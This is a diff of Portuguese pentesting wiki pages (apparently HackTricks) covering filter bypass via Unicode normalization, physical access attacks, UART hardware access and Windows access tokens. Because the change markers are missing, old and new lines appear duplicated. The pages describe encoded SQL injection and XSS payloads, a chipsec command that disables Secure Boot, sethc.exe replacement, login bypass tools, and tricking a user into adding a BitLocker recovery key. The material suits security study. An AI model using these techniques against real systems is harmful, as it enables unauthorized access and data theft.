Compreender a codificação Unicode é fundamental, especialmente ao lidar com problemas de interoperabilidade entre diferentes sistemas ou idiomas. Aqui estão os principais pontos:
- **Pontos de Código e Caracteres**: No Unicode, cada caractere ou símbolo é atribuído a um valor numérico conhecido como "ponto de código".
- **Representação em Bytes**: O ponto de código (ou caractere) é representado por um ou mais bytes na memória. Por exemplo, os caracteres LATIN-1 (comuns em países de língua inglesa) são representados usando um byte. No entanto, idiomas com um conjunto maior de caracteres precisam de mais bytes para representação.
- **Codificação**: Este termo refere-se a como os caracteres são transformados em uma série de bytes. UTF-8 é um padrão de codificação prevalente onde os caracteres ASCII são representados usando um byte e até quatro bytes para outros caracteres.
- **Processamento de Dados**: Sistemas que processam dados devem estar cientes da codificação usada para converter corretamente o fluxo de bytes em caracteres.
- **Variantes de UTF**: Além do UTF-8, existem outros padrões de codificação como UTF-16 (usando um mínimo de 2 bytes, até 4) e UTF-32 (usando 4 bytes para todos os caracteres).
* **Pontos de Código e Caracteres**: Na Unicode, cada caractere ou símbolo é atribuído a um valor numérico conhecido como "ponto de código".
* **Representação em Bytes**: O ponto de código (ou caractere) é representado por um ou mais bytes na memória. Por exemplo, caracteres LATIN-1 (comuns em países de língua inglesa) são representados usando um byte. No entanto, idiomas com um conjunto maior de caracteres precisam de mais bytes para representação.
* **Codificação**: Este termo refere-se a como os caracteres são transformados em uma série de bytes. UTF-8 é um padrão de codificação prevalente onde caracteres ASCII são representados usando um byte e até quatro bytes para outros caracteres.
* **Processamento de Dados**: Sistemas que processam dados devem estar cientes da codificação usada para converter corretamente o fluxo de bytes em caracteres.
* **Variantes de UTF**: Além do UTF-8, existem outros padrões de codificação como UTF-16 (usando um mínimo de 2 bytes, até 4) e UTF-32 (usando 4 bytes para todos os caracteres).
É crucial compreender esses conceitos para lidar efetivamente e mitigar problemas potenciais decorrentes da complexidade do Unicode e de seus diversos métodos de codificação.
Um exemplo de como o Unicode normaliza dois bytes diferentes representando o mesmo caractere:
Um exemplo de como Unicode normaliza dois bytes diferentes representando o mesmo caractere:
```python
unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "chlo\u00e9")
```
@ -49,17 +61,17 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
Se você encontrar dentro de um aplicativo da web um valor que está sendo ecoado de volta, você poderia tentar enviar **'KELVIN SIGN' (U+0212A)** que **normaliza para "K"** (você pode enviá-lo como `%e2%84%aa`). **Se um "K" for ecoado de volta**, então, algum tipo de **normalização Unicode** está sendo realizada.
Outro **exemplo**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` após **unicode** é `Leonishan`.
Outro **exemplo**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` após a **unicode** é `Leonishan`.
## **Exemplos Vulneráveis**
### **Burla de filtro de Injeção de SQL**
### **Burla de filtro de Injeção SQL**
Imagine uma página da web que está usando o caractere `'` para criar consultas SQL com a entrada do usuário. Esta web, como medida de segurança, **deleta** todas as ocorrências do caractere **`'`** da entrada do usuário, mas **após essa exclusão** e **antes da criação** da consulta, ela **normaliza** usando **Unicode** a entrada do usuário.
Então, um usuário malicioso poderia inserir um caractere Unicode diferente equivalente a `' (0x27)` como `%ef%bc%87`, quando a entrada é normalizada, uma aspa simples é criada e uma **vulnerabilidade de Injeção de SQL** aparece:
Então, um usuário malicioso poderia inserir um caractere Unicode diferente equivalente a `' (0x27)` como `%ef%bc%87`, quando a entrada é normalizada, uma aspa simples é criada e uma **vulnerabilidade de Injeção SQL** aparece:
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (157) (1).png>)
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
**Alguns caracteres Unicode interessantes**
@ -95,24 +107,36 @@ Então, um usuário malicioso poderia inserir um caractere Unicode diferente equ
Você poderia usar um dos seguintes caracteres para enganar o aplicativo da web e explorar um XSS:
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (1).png>)
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
Observe que, por exemplo, o primeiro caractere Unicode proposto pode ser enviado como: `%e2%89%ae` ou como `%u226e`
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1).png>)
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1) (1).png>)
### Fuzzing Regexes
### Fuzzing de Regexes
Quando o backend está **verificando a entrada do usuário com um regex**, pode ser possível que a **entrada** esteja sendo **normalizada** para o **regex** mas **não** para onde está sendo **usada**. Por exemplo, em um Redirecionamento Aberto ou SSRF o regex pode estar **normalizando o URL enviado** mas então **acessando-o como está**.
A ferramenta [**recollapse**](https://github.com/0xacb/recollapse) permite **gerar variações da entrada** para fuzzar o backend. Para mais informações, verifique o **github** e este [**post**](https://0xacb.com/2022/11/21/recollapse/).
A ferramenta [**recollapse**](https://github.com/0xacb/recollapse) permite **gerar variações da entrada** para fuzz o backend. Para mais informações, verifique o **github** e este [**post**](https://0xacb.com/2022/11/21/recollapse/).
## Referências
* [**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@ -120,9 +144,9 @@ A ferramenta [**recollapse**](https://github.com/0xacb/recollapse) permite **ger
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

42
physical-attacks/physical-attacks.md
View file

@ -6,7 +6,7 @@
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
@ -14,17 +14,31 @@ Outras maneiras de apoiar o HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares roubadores**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Recuperação de Senha do BIOS e Segurança do Sistema
**Redefinir o BIOS** pode ser feito de várias maneiras. A maioria das placas-mãe inclui uma **bateria** que, quando removida por cerca de **30 minutos**, irá redefinir as configurações do BIOS, incluindo a senha. Alternativamente, um **jumper na placa-mãe** pode ser ajustado para redefinir essas configurações conectando pinos específicos.
Para situações em que ajustes de hardware não são possíveis ou práticos, **ferramentas de software** oferecem uma solução. Executar um sistema a partir de um **Live CD/USB** com distribuições como **Kali Linux** fornece acesso a ferramentas como **_killCmos_** e **_CmosPWD_**, que podem ajudar na recuperação da senha do BIOS.
Para situações em que ajustes de hardware não são possíveis ou práticos, ferramentas **de software** oferecem uma solução. Executar um sistema a partir de um **Live CD/USB** com distribuições como **Kali Linux** fornece acesso a ferramentas como **_killCmos_** e **_CmosPWD_**, que podem ajudar na recuperação da senha do BIOS.
Nos casos em que a senha do BIOS é desconhecida, inseri-la incorretamente **três vezes** geralmente resultará em um código de erro. Este código pode ser usado em sites como [https://bios-pw.org](https://bios-pw.org) para potencialmente recuperar uma senha utilizável.
### Segurança UEFI
Para sistemas modernos que utilizam **UEFI** em vez do BIOS tradicional, a ferramenta **chipsec** pode ser utilizada para analisar e modificar as configurações do UEFI, incluindo a desativação do **Secure Boot**. Isso pode ser feito com o seguinte comando:
Para sistemas modernos que usam **UEFI** em vez do BIOS tradicional, a ferramenta **chipsec** pode ser utilizada para analisar e modificar as configurações do UEFI, incluindo a desativação do **Secure Boot**. Isso pode ser feito com o seguinte comando:
`python chipsec_main.py -module exploits.secure.boot.pk`
@ -34,13 +48,13 @@ A RAM retém dados brevemente após o corte de energia, geralmente por **1 a 2 m
### Ataques de Acesso Direto à Memória (DMA)
**INCEPTION** é uma ferramenta projetada para **manipulação física de memória** por meio de DMA, compatível com interfaces como **FireWire** e **Thunderbolt**. Permite a passagem por procedimentos de login, patcheando a memória para aceitar qualquer senha. No entanto, é ineficaz contra sistemas **Windows 10**.
**INCEPTION** é uma ferramenta projetada para **manipulação física de memória** por meio de DMA, compatível com interfaces como **FireWire** e **Thunderbolt**. Ele permite a bypassar procedimentos de login, patcheando a memória para aceitar qualquer senha. No entanto, é ineficaz contra sistemas **Windows 10**.
### Live CD/USB para Acesso ao Sistema
Alterar binários do sistema como **_sethc.exe_** ou **_Utilman.exe_** com uma cópia do **_cmd.exe_** pode fornecer um prompt de comando com privilégios de sistema. Ferramentas como **chntpw** podem ser usadas para editar o arquivo **SAM** de uma instalação do Windows, permitindo alterações de senha.
**Kon-Boot** é uma ferramenta que facilita o login em sistemas Windows sem saber a senha temporariamente modificando o kernel do Windows ou UEFI. Mais informações podem ser encontradas em [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
**Kon-Boot** é uma ferramenta que facilita o login em sistemas Windows sem saber a senha, modificando temporariamente o kernel do Windows ou UEFI. Mais informações podem ser encontradas em [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
### Lidando com Recursos de Segurança do Windows
@ -48,7 +62,7 @@ Alterar binários do sistema como **_sethc.exe_** ou **_Utilman.exe_** com uma c
- **Supr**: Acessar configurações do BIOS.
- **F8**: Entrar no modo de Recuperação.
- Pressionar **Shift** após o banner do Windows pode ignorar o autologon.
- Pressionar **Shift** após o banner do Windows pode ignorar a autenticação automática.
#### Dispositivos BAD USB
@ -58,24 +72,10 @@ Dispositivos como **Rubber Ducky** e **Teensyduino** servem como plataformas par
Privilégios de administrador permitem a criação de cópias de arquivos sensíveis, incluindo o arquivo **SAM**, por meio do PowerShell.
### Bypass da Criptografia BitLocker
### Bypassing da Criptografia BitLocker
A criptografia BitLocker pode ser potencialmente ignorada se a **senha de recuperação** for encontrada em um arquivo de dump de memória (**MEMORY.DMP**). Ferramentas como **Elcomsoft Forensic Disk Decryptor** ou **Passware Kit Forensic** podem ser utilizadas para esse fim.
### Engenharia Social para Adição de Chave de Recuperação
Uma nova chave de recuperação do BitLocker pode ser adicionada por meio de táticas de engenharia social, convencendo um usuário a executar um comando que adiciona uma nova chave de recuperação composta por zeros, simplificando assim o processo de descriptografia.
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

62
todo/hardware-hacking/uart.md
View file

@ -6,14 +6,28 @@
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Informações Básicas
UART é um protocolo serial, o que significa que ele transfere dados entre componentes um bit de cada vez. Em contraste, protocolos de comunicação paralela transmitem dados simultaneamente por meio de vários canais. Protocolos seriais comuns incluem RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express e USB.
@ -37,25 +51,25 @@ UART possui 4 portas: **TX**(Transmitir), **RX**(Receber), **Vcc**(Tensão) e **
Com um **multímetro** e o dispositivo desligado:
* Para identificar o pino **GND**, use o modo de **Teste de Continuidade**, coloque o fio de retorno no terra e teste com o fio vermelho até ouvir um som do multímetro. Vários pinos GND podem ser encontrados no PCB, então você pode ter encontrado ou não o que pertence à UART.
* Para identificar a porta **VCC**, configure o modo de **tensão contínua** e ajuste-o para 20 V de tensão. Sonda preta no terra e sonda vermelha no pino. Ligue o dispositivo. Se o multímetro medir uma tensão constante de 3,3 V ou 5 V, você encontrou o pino Vcc. Se obtiver outras tensões, tente com outras portas.
* Para identificar a porta **TX**, **modo de tensão contínua** até 20 V de tensão, sonda preta no terra e sonda vermelha no pino, e ligue o dispositivo. Se encontrar a tensão flutuar por alguns segundos e depois estabilizar no valor de Vcc, você provavelmente encontrou a porta TX. Isso ocorre porque ao ligar, ele envia alguns dados de depuração.
* A **porta RX** seria a mais próxima das outras 3, tem a menor flutuação de tensão e o menor valor geral de todos os pinos UART.
* Para identificar a porta **VCC**, configure o modo de **tensão contínua** e ajuste-o para 20 V de tensão. Sonda preta no terra e sonda vermelha no pino. Ligue o dispositivo. Se o multímetro medir uma tensão constante de 3,3 V ou 5 V, você encontrou o pino Vcc. Se você obter outras tensões, tente com outros pinos.
* Para identificar a porta **TX**, **modo de tensão contínua** até 20 V de tensão, sonda preta no terra e sonda vermelha no pino, e ligue o dispositivo. Se você encontrar a tensão flutuando por alguns segundos e depois estabilizando no valor de Vcc, você provavelmente encontrou a porta TX. Isso ocorre porque ao ligar, ele envia alguns dados de depuração.
* A **porta RX** seria a mais próxima das outras 3, tem a menor flutuação de tensão e o valor geral mais baixo de todos os pinos UART.
Você pode confundir as portas TX e RX e nada acontecerá, mas se confundir o GND e a porta VCC, você pode danificar o circuito.
Em alguns dispositivos-alvo, a porta UART é desativada pelo fabricante desativando RX ou TX ou até mesmo ambos. Nesse caso, pode ser útil rastrear as conexões na placa de circuito e encontrar algum ponto de interrupção. Uma forte dica sobre a confirmação da não detecção da UART e a quebra do circuito é verificar a garantia do dispositivo. Se o dispositivo foi enviado com alguma garantia, o fabricante deixa algumas interfaces de depuração (neste caso, UART) e, portanto, deve ter desconectado a UART e a conectaria novamente durante a depuração. Esses pinos de interrupção podem ser conectados por soldagem ou fios jumper.
Em alguns dispositivos-alvo, a porta UART é desativada pelo fabricante desativando RX ou TX ou até mesmo ambos. Nesse caso, pode ser útil rastrear as conexões na placa de circuito e encontrar algum ponto de interrupção. Uma forte dica sobre a confirmação da não detecção da UART e a interrupção do circuito é verificar a garantia do dispositivo. Se o dispositivo foi enviado com alguma garantia, o fabricante deixa algumas interfaces de depuração (neste caso, UART) e, portanto, deve ter desconectado a UART e a conectaria novamente durante a depuração. Esses pinos de interrupção podem ser conectados por soldagem ou fios jumper.
### Identificando a Taxa de Baud da UART
### Identificando a Taxa de Baud UART
A maneira mais fácil de identificar a taxa de baud correta é olhar a **saída do pino TX e tentar ler os dados**. Se os dados que você receber não forem legíveis, mude para a próxima taxa de baud possível até que os dados se tornem legíveis. Você pode usar um adaptador USB-para-serial ou um dispositivo multipropósito como o Bus Pirate para fazer isso, emparelhado com um script auxiliar, como [baudrate.py](https://github.com/devttys0/baudrate/). As taxas de baud mais comuns são 9600, 38400, 19200, 57600 e 115200.
A maneira mais fácil de identificar a taxa de baud correta é olhar a **saída do pino TX e tentar ler os dados**. Se os dados que você receber não forem legíveis, mude para a próxima taxa de baud possível até que os dados se tornem legíveis. Você pode usar um adaptador USB-para-serial ou um dispositivo multipropósito como Bus Pirate para fazer isso, emparelhado com um script auxiliar, como [baudrate.py](https://github.com/devttys0/baudrate/). As taxas de baud mais comuns são 9600, 38400, 19200, 57600 e 115200.
{% hint style="danger" %}
É importante observar que neste protocolo você precisa conectar o TX de um dispositivo ao RX do outro!
{% endhint %}
## Adaptador UART CP210X para TTY
## Adaptador CP210X UART para TTY
O Chip CP210X é usado em muitas placas de prototipagem como NodeMCU (com esp8266) para Comunicação Serial. Esses adaptadores são relativamente baratos e podem ser usados para se conectar à interface UART do alvo. O dispositivo possui 5 pinos: 5V, GND, RXD, TXD, 3.3V. Certifique-se de conectar a tensão suportada pelo alvo para evitar danos. Por fim, conecte o pino RXD do Adaptador ao TXD do alvo e o pino TXD do Adaptador ao RXD do alvo.
O Chip CP210X é usado em muitas placas de prototipagem como NodeMCU (com esp8266) para Comunicação Serial. Esses adaptadores são relativamente baratos e podem ser usados para se conectar à interface UART do alvo. O dispositivo possui 5 pinos: 5V, GND, RXD, TXD, 3.3V. Certifique-se de conectar a tensão suportada pelo alvo para evitar danos. Finalmente, conecte o pino RXD do Adaptador ao TXD do alvo e o pino TXD do Adaptador ao RXD do alvo.
Caso o adaptador não seja detectado, certifique-se de que os drivers CP210X estão instalados no sistema hospedeiro. Uma vez que o adaptador é detectado e conectado, ferramentas como picocom, minicom ou screen podem ser usadas.
@ -71,7 +85,7 @@ Para o minicom, use o seguinte comando para configurá-lo:
```
minicom -s
```
Configure as configurações como baudrate e nome do dispositivo na opção `Configuração da porta serial`.
Configure as configurações, como a taxa de transmissão e o nome do dispositivo na opção `Configuração da porta serial`.
Após a configuração, use o comando `minicom` para iniciar o Console UART.
@ -79,9 +93,9 @@ Após a configuração, use o comando `minicom` para iniciar o Console UART.
Caso os adaptadores UART Serial para USB não estejam disponíveis, o Arduino UNO R3 pode ser usado com um hack rápido. Como o Arduino UNO R3 geralmente está disponível em qualquer lugar, isso pode economizar muito tempo.
O Arduino UNO R3 possui um adaptador USB para Serial integrado na própria placa. Para obter a conexão UART, basta retirar o chip microcontrolador Atmel 328p da placa. Este hack funciona em variantes do Arduino UNO R3 que não possuem o Atmel 328p soldado na placa (versão SMD é usada nele). Conecte o pino RX do Arduino (Pino Digital 0) ao pino TX da Interface UART e o pino TX do Arduino (Pino Digital 1) ao pino RX da interface UART.
O Arduino UNO R3 possui um adaptador USB para Serial integrado na própria placa. Para obter a conexão UART, basta retirar o chip microcontrolador Atmel 328p da placa. Este hack funciona em variantes do Arduino UNO R3 que não possuem o Atmel 328p soldado na placa (a versão SMD é usada nele). Conecte o pino RX do Arduino (Pino Digital 0) ao pino TX da Interface UART e o pino TX do Arduino (Pino Digital 1) ao pino RX da interface UART.
Por fim, é recomendado usar o Arduino IDE para obter o Console Serial. Na seção `ferramentas` no menu, selecione a opção `Console Serial` e defina a taxa de baudagem conforme a interface UART.
Por fim, é recomendado usar o Arduino IDE para obter o Console Serial. Na seção `ferramentas` no menu, selecione a opção `Console Serial` e defina a taxa de transmissão conforme a interface UART.
## Bus Pirate
@ -159,7 +173,7 @@ waiting a few secs to repeat....
```
## Despejando Firmware com Console UART
A Console UART fornece uma ótima maneira de trabalhar com o firmware subjacente em um ambiente de tempo de execução. Mas quando o acesso à Console UART é somente leitura, pode introduzir muitas restrições. Em muitos dispositivos embarcados, o firmware é armazenado em EEPROMs e executado em processadores que possuem memória volátil. Portanto, o firmware é mantido somente leitura, uma vez que o firmware original durante a fabricação está dentro da própria EEPROM e quaisquer novos arquivos seriam perdidos devido à memória volátil. Portanto, despejar o firmware é um esforço valioso ao trabalhar com firmwares embarcados.
A Console UART fornece uma ótima maneira de trabalhar com o firmware subjacente em um ambiente de tempo de execução. Mas quando o acesso à Console UART é somente leitura, pode introduzir muitas restrições. Em muitos dispositivos embarcados, o firmware é armazenado em EEPROMs e executado em processadores que possuem memória volátil. Portanto, o firmware é mantido somente leitura, uma vez que o firmware original durante a fabricação está dentro da EEPROM em si e quaisquer novos arquivos seriam perdidos devido à memória volátil. Portanto, despejar o firmware é um esforço valioso ao trabalhar com firmwares embarcados.
Existem muitas maneiras de fazer isso e a seção SPI abrange métodos para extrair o firmware diretamente da EEPROM com vários dispositivos. Embora seja recomendado primeiro tentar despejar o firmware com UART, uma vez que despejar o firmware com dispositivos físicos e interações externas pode ser arriscado.
@ -173,7 +187,7 @@ Normalmente, o comando para despejar o firmware é:
```
md
```
que significa "despejo de memória". Isso irá despejar a memória (Conteúdo da EEPROM) na tela. É recomendado registrar a saída do Console Serial antes de iniciar o procedimento para capturar o despejo de memória.
que significa "despejo de memória". Isso irá despejar a memória (Conteúdo da EEPROM) na tela. É recomendável registrar a saída do Console Serial antes de iniciar o procedimento para capturar o despejo de memória.
Por fim, basta remover todos os dados desnecessários do arquivo de log e armazenar o arquivo como `nome_do_arquivo.rom` e usar o binwalk para extrair o conteúdo:
```
@ -181,7 +195,21 @@ binwalk -e <filename.rom>
```
Isso irá listar os possíveis conteúdos da EEPROM conforme as assinaturas encontradas no arquivo hex.
Embora seja necessário observar que nem sempre é o caso de que o <b>uboot</b> está desbloqueado mesmo que esteja sendo usado. Se a tecla Enter não fizer nada, verifique outras teclas como a tecla Space, etc. Se o bootloader estiver bloqueado e não for interrompido, este método não funcionará. Para verificar se o <b>uboot</b> é o bootloader do dispositivo, verifique a saída no Console UART durante a inicialização do dispositivo. Pode mencionar o <b>uboot</b> durante a inicialização.
Embora seja necessário observar que nem sempre é o caso de que o <b>uboot</b> está desbloqueado mesmo que esteja sendo usado. Se a tecla Enter não fizer nada, verifique outras teclas como a tecla de Espaço, etc. Se o bootloader estiver bloqueado e não for interrompido, este método não funcionará. Para verificar se o <b>uboot</b> é o bootloader do dispositivo, verifique a saída no Console UART durante a inicialização do dispositivo. Pode mencionar o <b>uboot</b> durante a inicialização.
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O objetivo principal do WhiteIntel é combater invasões de contas e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
@ -193,6 +221,6 @@ Outras maneiras de apoiar o HackTricks:
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

61
windows-hardening/windows-local-privilege-escalation/access-tokens.md
View file

@ -1,4 +1,4 @@
# Access Tokens
# Tokens de Acesso
<details>
@ -12,12 +12,25 @@
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares roubadores**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Tokens de Acesso
Cada **usuário logado** no sistema **possui um token de acesso com informações de segurança** para aquela sessão de logon. O sistema cria um token de acesso quando o usuário faz o logon. **Cada processo executado** em nome do usuário **possui uma cópia do token de acesso**. O token identifica o usuário, os grupos do usuário e os privilégios do usuário. Um token também contém um SID de logon (Identificador de Segurança) que identifica a sessão de logon atual.
Cada **usuário logado** no sistema **possui um token de acesso com informações de segurança** para aquela sessão de logon. O sistema cria um token de acesso quando o usuário faz o login. **Cada processo executado** em nome do usuário **possui uma cópia do token de acesso**. O token identifica o usuário, os grupos do usuário e os privilégios do usuário. Um token também contém um SID de logon (Identificador de Segurança) que identifica a sessão de logon atual.
Você pode ver essas informações executando `whoami /all`
```
whoami /all
@ -61,43 +74,38 @@ SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
```
### Administrador local
Quando um administrador local faz login, **dois tokens de acesso são criados**: Um com direitos de administrador e outro com direitos normais. **Por padrão**, quando esse usuário executa um processo, o **token com direitos normais é utilizado**. Quando esse usuário tenta **executar** algo **como administrador** ("Executar como Administrador", por exemplo), o **UAC** será usado para solicitar permissão.\
